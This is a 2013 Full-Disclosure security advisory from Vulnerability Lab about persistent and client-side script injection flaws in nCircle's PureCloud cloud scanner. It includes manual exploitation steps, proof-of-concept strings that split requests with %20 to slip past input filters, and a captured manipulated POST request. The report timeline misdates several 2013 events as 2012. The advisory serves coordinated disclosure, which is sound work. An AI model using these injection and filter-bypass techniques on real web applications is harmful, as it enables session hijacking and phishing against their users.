[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] nCircle PureCloud Vulnerability Scanner - Multiple Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-01-29 10:20:15
Message-ID: 5107A25F.3000209 () vulnerability-lab ! com
[Download RAW message or body]
Title:
======
nCircle PureCloud Vulnerability Scanner - Multiple Vulnerabilities
Date:
=====
2013-01-28
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=795
nCircle Tracking ID: 20130117-US11337
VL-ID:
=====
795
Common Vulnerability Scoring System:
====================================
4.1
Introduction:
=============
nCircle PureCloud is brought to you by nCircle, the leading provider of information risk and \
security performance management solutions. PureCloud delivers an enterprise-class \
vulnerability scanner with more than double the coverage of other providers covering thousands \
of conditions and prioritized risk assessments – all in a cloud-based solution.
nCircle PureCloud is the world's first security scanning technology that requires no scanning \
infrastructure on the customer network. PureCloud eliminates the need for firewall changes and \
software or hardware deployment on a customer`s internal network.. Requiring only a Web \
browser, PureCloud securely scans a private network to identify a broad range of \
vulnerabilities and risks, and provides detailed guidance on the steps necessary to reduce or \
eliminate those risks. With PureCloud, small businesses and home offices benefit from nCircle's \
most advanced enterprise class security scanning solution, without the complexity or \
maintenance associated with traditional SaaS or on-premise scanning products. PureCloud is \
delivered as a software service in the Cloud, making it cost-effective, efficient and widely \
accessible.
(Copy of the Vendor Homepage: https://purecloud.ncircle.com/about_purecloud/ )
Abstract:
=========
The Vulnerability-Laboratory Research Team discovered a web vulnerability in the nCircle \
PureCloud (cloud-based) Vulnerability Scanner Application.
Report-Timeline:
================
2012-12-24: Researcher Notification & Coordination
2012-12-25: Vendor Notification
2012-01-16: Vendor Response/Feedback
2012-01-28: Vendor Fix/Patch by nCricle Dev
2012-01-28: Public Disclosure
Status:
========
Published
Affected Products:
==================
nCircle
Product: PureCloud - Vulnerability Scanner (cloud-based) 2012 Q4
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
A persistent and client side POST Injection web vulnerability is detected in the in the nCircle \
PureCloud (cloud-based) Vulnerability Scanner Application. The vulnerability typus allows an \
attacker to inject own malicious script code in the vulnerable module on application side \
(persistent).
1.1
The first vulnerability is located in the Scan Now > Scan Type > Perimeter Scan > Scan section \
when processing to request via the `Scan Specific Devices - [Add Devices]` module and the \
bound vulnerable formErrorContent exception-handling application parameters. The persistent \
injected script code will be executed out of the `invalid networks` web application \
exception-handling. To bypass the standard validation of the application filter the attacker \
need to provoke the specific invalid networks exception-handling error. In the secound step the \
attacker splits the request of the invalid filter context to execute after it the not parsed \
malicious script code. The vulnerability can be exploited on client side via force manipulated \
link as malicious request with medium user interaction but also via server side by a post \
injection in the later affected add server listing module.
1.2
The secound vulnerability is bound to the first issue and located in the IP & Name output \
listing of the scan index after processing to add a network/server/ip. The code will be \
executed out of the main ip & name listing after an evil inject via add module. To bypass the \
ip restriction filter it is required to split the request like in the first issue with a valid \
ip. The remote attacker includes a valid ip+split(%20)`+own_scriptcode to pass through the \
system validation filter and execute the script code out of the device name and ip listing.
The vulnerability can be exploited with privileged application user account and low or medium \
required user interaction. Successful exploitation of the vulnerability result in \
persistent/non-persistent session hijacking, persistent/non-persistent phishing, external \
redirect, external malware loads and persistent/non-persistent vulnerable module context \
manipulation.
Vulnerable Service(s):
[+] nCircle PureCloud (cloud-based) Vulnerability Scanner \
[https://purecloud.ncircle.com/index/]
Vulnerable Section(s):
[+] Scan Now > Scan Type > Perimeter Scan > Scan
Vulnerable Module(s):
[+] Scan Specific Devices - [Add Devices]
[+] Scan IP (Index)
Vulnerable Parameter(s):
[+] formErrorContent
[+] ip &- name
Affected Module(s):
[+] Exception Handling - Invalid Network(s)
[+] Scan Index - Listing
Proof of Concept:
=================
The client- & server-side web vulnerability can be exploited by remote attackers and local \
privileged application user accounts with low or medium user interaction. For demonstration or \
reproduce ...
1.1
Note:
When you try to inject a standard iframe, img src, script or onload the context will be parsed \
by the exception-handling to prevent the first execution after the inject attempt. To bypass \
the validation we first inject a frame which matches with the invalid exception filter to \
display the error. Now, we split the request with %20 and inject our code after the split via \
POST.
Manually Exploitation:
1. Register an account at nCircle PureCloud to get access to the (cloud-based) Vulnerability \
Scanner- [https://purecloud.ncircle.com/registerinfo3/?hacknewssocial] 2. Login to your account \
and switch to the scan now menu, open the scan type site 3. Choose the Perimeter Scan, not the \
local one! 4. Include a standard script alert tag to provoke the exception-handling, split the \
request with %20' and inject your own frame onload script code. Save via Add! 5. The scirpt \
code will be executed out of the exception-handling invalid networks message. 6. Done #1 ... \
Successful reproduced! Press Continue to exploit also the listing :)
7. Include a valid ip, split the request (bypass the input restriction) and inject after it \
your own script code. 8. Watch the scan index. The code will be executed out of the vulnerable \
name and ip value output listing. 9. Done #2 ... Successful reproduced!
PoC:
#1 <iframe src=PROVOKEINVALIDEXCEPTION1> %20' >"<[OWN INJECTED PERSISTENT SCRIPT CODE!]>
#2 <script>alert("PROVOKEINVALIDEXCEPTION2")</script> < %20' "><[OWN INJECTED PERSISTENT SCRIPT \
CODE!]) <
Review: Scan Specific Devices > [Add Devices] - Exception Handling - Invalid Network(s)
<div style="opacity: 0.87; position: absolute; top: 287px; left: 461px; margin-top: -200px;"
class="id_add_hosts_textformError parentFormscan-form formError">
<div class="formErrorContent">
The following networks are invalid: %20"><"><script>alert(\"PROVOKEEXCEPTION\")> < %20' \
">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]> (host not found)</iframe></div><div \
class="formErrorArrow"><div class="line10"><!-- --></div><div class="line9"><!-- --></div> <div \
class="line8"><!-- --></div><div class="line7"><!-- --></div><div class="line6"><!-- \
--></div><div class="line5"><!-- --></div> <div class="line4"><!-- --></div><div \
class="line3"><!-- --></div><div class="line2"><!-- --></div><div class="line1"><!-- \
--></div></div></div> <input value="%20"><iframe src=[PROVOKE!]>%20 \
>"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]>" id="id_add_hosts_text" tabindex="5" \
> class="wizardInput" placeholder="Add Devices" type="text">
<button id="add_button" class="addButton">Add</button>
</div>
--- Manipulated POST Values ---
csrfmiddlewaretoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N
json_data={"connector":-1,"scan_connected_network":false,
"registration_id":"","scope_name":"","editing_scope_schedule":false,
"webapp":false,"targets":["><script>alert(\"PROVOKEEXCEPTION\")> < %20' \
">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]) <"]}
--- Manipulated POST Request ---
Status: 200[OK]
POST https://purecloud.ncircle.com/services/validate_targets/
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[181] Mime \
Type[application/json]
Request Header:
Host[purecloud.ncircle.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://purecloud.ncircle.com/index/]
Content-Length[439]
Cookie[csrftoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N;
sessionid=8c8624ba5e31c63bf24bcbf9af796743;
BIGipServerPICO-443to80=1875711404.20480.0000; utmcct=/ben37.root; \
wcsid=uNTCNCc0tpp1NCv01YCYlGfr93631472; hblid=kRw3BvqhoczGhyJc8E8J5dYW93631472;
_oklv=1356379996583%2CuNTCNCc0tpp1NCv01YCYlGfr93631472;
olfsk=olfsk02835150931791619;
_okbk=cd5%3Davailable%2Ccd4%3Dtrue%2Cwa1%3Dfalse%2Cvi5%3D0%2Cvi4%3D1356378355284%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8
%3Dchat%2Ccd6%3D0%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9363-144-10-3734; \
__unam=97cb67-13bce735458-18f208d4-21; \
_mkto_trk=id:671-RXE-353&token:_mch-ncircle.com-1356378363952-41877] Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
csrfmiddlewaretoken[HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N]
json_data[%7B%22connector%22%3A-1%2C%22scan_connected_network%22%3Afalse%2C%22registration_id%22%3A%22%22%2C%22scope_name
%22%3A%22%22%2C%22editing_scope_schedule%22%3Afalse%2C%22webapp%22%3Afalse%2C%22targets%22%3A%5B%22%2520%5C%22+%2520+%5C%22%3E%3C
iframe+src%3Da+onload%3Dalert(%5C%22PROVOKEEXCEPtION%5C%22)+%3C++%5C%22%3E%3C[PERSISTENT/NON-PERSISTENT \
INJECTED SCRIPT CODE!])+%3C%22%5D%7D]
Response Header:
Date[Mon, 24 Dec 2012 20:13:25 GMT]
Server[Apache]
Content-Language[en]
Content-Encoding[gzip]
Vary[Accept-Language,Cookie,Accept-Encoding]
X-Frame-Options[SAMEORIGIN]
Content-Length[181]
Keep-Alive[timeout=15, max=76]
Connection[Keep-Alive]
Content-Type[application/json]
1.2
The server-side (persistent) web vulnerability can be exploited by remote attackers and local \
privileged application user accounts with low user interaction. For demonstration or reproduce \
...
PoC:
[VALID IP]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...
[VALID NAME]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...
Solution:
=========
Parse the exception-handling error output listing and disallow error echos with requested web \
context. To fix the vulnerability parse the context of the input fields in the add devices \
module. Restrict the the input fields with a secure filter mask. Parse also the name & ip scan \
index output listing and restrict the input of the requested web context scan listing.
2012-01-28: Vendor Fix/Patch by nCricle Dev
Risk:
=====
1.1
The security risk of the client- and server-side post injection web vulnerability in the \
exception handling and listing is estimated as medium(+).
1.2
The security risk of the persistent input validation vulnerability in the scan index listing is \
estimated as medium(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - \
research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - \
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, sourcecode, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to \
get a permission.
Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic